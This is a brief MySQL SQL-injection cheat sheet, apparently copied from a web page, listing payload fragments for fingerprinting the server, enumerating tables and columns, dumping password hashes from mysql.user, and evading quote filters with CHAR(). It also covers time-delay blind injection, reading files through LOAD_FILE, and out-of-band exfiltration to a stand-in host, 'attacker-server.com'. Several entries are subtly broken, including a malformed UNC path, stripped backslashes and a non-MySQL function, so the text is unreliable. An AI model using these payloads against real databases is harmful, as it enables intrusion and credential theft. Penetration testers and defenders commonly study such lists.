Comments
1 | # |
Version
1 | SELECT VERSION(); |
User details
1 | user() |
Database details
1 | SELECT db_name(); |
Database credentials
1 | SELECT host, user, password FROM mysql.user; |
Server details
1 | SELECT @@hostname; |
Table Name
1 | SELECT table_name FROM information_schema.tables; |
Columns Names
1 | SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename'; |
No Quotes
1 | CONCAT(CHAR(97), CHAR(98), CHAR(99)) |
String Concatenation
1 | CONCAT(foo, bar) |
Conditionals
1 | SELECT IF(1=1,'true','false'); |
Time-delay
1 | Sleep(10) |
Read Files
1 | SELECT LOAD_FILE('C:Windowswin.ini'); |
Out-of-Band Retrieval
1 | SELECT LOAD_FILE(concat("\\",(SELECT 1), "attacker-server.com\"); |
Substrings
1 | SELECT substr('Foobar', 1, 1); |
Retrieve Nth Line
1 | SELECT * FROM table ORDER BY ID LIMIT 3,1 |